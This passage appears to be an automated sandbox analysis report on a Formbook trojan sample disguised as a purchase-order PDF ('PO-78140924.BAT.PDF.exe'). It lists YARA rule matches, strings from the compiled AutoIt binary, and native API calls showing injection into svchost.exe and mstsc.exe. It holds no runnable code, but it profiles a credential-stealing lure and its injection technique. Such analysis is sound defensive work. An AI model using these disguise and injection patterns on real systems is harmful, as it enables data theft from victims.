            Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: PO-78140924.BAT.PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e3465d58-a
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_daa819c9-d
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PO-78140924.BAT.PDF.exe
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00013688 NtdllDefWindowProc_W,PostQuitMessage,0_2_00013688
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C216 PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0009C216
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00011290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00011290
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D422 NtdllDialogWndProc_W,0_2_0009D422
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D4A8 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_0009D4A8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C502 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0009C502
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C5E7 SendMessageW,NtdllDialogWndProc_W,0_2_0009C5E7
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C668 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0009C668
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001167D NtdllDialogWndProc_W,0_2_0001167D
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000116B5 NtdllDialogWndProc_W,0_2_000116B5
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000116DE GetParent,NtdllDialogWndProc_W,0_2_000116DE
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000136E5 NtdllDefWindowProc_W,0_2_000136E5
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D7F6 NtdllDialogWndProc_W,0_2_0009D7F6
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001189B NtdllDialogWndProc_W,0_2_0001189B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C8CA NtdllDialogWndProc_W,0_2_0009C8CA
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C8F9 NtdllDialogWndProc_W,0_2_0009C8F9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C928 NtdllDialogWndProc_W,0_2_0009C928
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001192B NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_0001192B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C973 NtdllDialogWndProc_W,0_2_0009C973
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C9A8 ClientToScreen,NtdllDialogWndProc_W,0_2_0009C9A8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00011AC2 NtdllDialogWndProc_W,0_2_00011AC2
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CAE6 GetWindowLongW,NtdllDialogWndProc_W,0_2_0009CAE6
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0009CB26
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009BF9A NtdllDialogWndProc_W,0_2_0009BF9A
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009BFF6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0009BFF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C553 NtClose,2_2_0042C553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,2_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045635C0 NtCreateMutant,LdrInitializeThunk,4_2_045635C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04564650 NtSuspendThread,LdrInitializeThunk,4_2_04564650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04564340 NtSetContextThread,LdrInitializeThunk,4_2_04564340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04562C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C60 NtCreateKey,LdrInitializeThunk,4_2_04562C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04562CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04562D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04562D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DD0 NtDelayExecution,LdrInitializeThunk,4_2_04562DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04562DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04562EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04562E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F30 NtCreateSection,LdrInitializeThunk,4_2_04562F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FE0 NtCreateFile,LdrInitializeThunk,4_2_04562FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FB0 NtResumeThread,LdrInitializeThunk,4_2_04562FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045639B0 NtGetContextThread,LdrInitializeThunk,4_2_045639B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AD0 NtReadFile,LdrInitializeThunk,4_2_04562AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AF0 NtWriteFile,LdrInitializeThunk,4_2_04562AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562B60 NtClose,LdrInitializeThunk,4_2_04562B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04562BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04562BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04562BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563010 NtOpenDirectoryObject,4_2_04563010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563090 NtSetValueKey,4_2_04563090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C00 NtQueryInformationProcess,4_2_04562C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CC0 NtQueryVirtualMemory,4_2_04562CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CF0 NtOpenProcess,4_2_04562CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563D70 NtOpenThread,4_2_04563D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563D10 NtOpenProcessToken,4_2_04563D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D00 NtSetInformationFile,4_2_04562D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DB0 NtEnumerateKey,4_2_04562DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562E30 NtWriteVirtualMemory,4_2_04562E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562EA0 NtAdjustPrivilegesToken,4_2_04562EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F60 NtCreateProcessEx,4_2_04562F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F90 NtProtectVirtualMemory,4_2_04562F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FA0 NtQuerySection,4_2_04562FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AB0 NtWaitForSingleObject,4_2_04562AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562B80 NtQueryInformationFile,4_2_04562B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9040 NtReadFile,4_2_004A9040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9130 NtDeleteFile,4_2_004A9130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A91D0 NtClose,4_2_004A91D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9330 NtAllocateVirtualMemory,4_2_004A9330
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A8EE0 NtCreateFile,4_2_004A8EE0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001E0600_2_0001E060
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000231900_2_00023190
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000333070_2_00033307
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000323450_2_00032345
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003F3590_2_0003F359
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000464520_2_00046452
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000425AE0_2_000425AE
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000316040_2_00031604
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000256800_2_00025680
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003277A0_2_0003277A
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000378130_2_00037813
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000258C00_2_000258C0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0004890F0_2_0004890F
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001192B0_2_0001192B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000289680_2_00028968
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000469C40_2_000469C4
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00031AF80_2_00031AF8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003CCA10_2_0003CCA1
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00097E0D0_2_00097E0D
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001FEA90_2_0001FEA9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00031F100_2_00031F10
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003BF260_2_0003BF26
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00046F360_2_00046F36
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185632_2_00418563
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0A32_2_0040E0A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031092_2_00403109
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031102_2_00403110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EB332_2_0042EB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDFC2_2_0040FDFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026702_2_00402670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE032_2_0040FE03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167432_2_00416743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeCode function: 3_2_0637A29E3_2_0637A29E
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeCode function: 3_2_0639E2053_2_0639E205
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045E24464_2_045E2446
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045214604_2_04521460
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045EF43F4_2_045EF43F
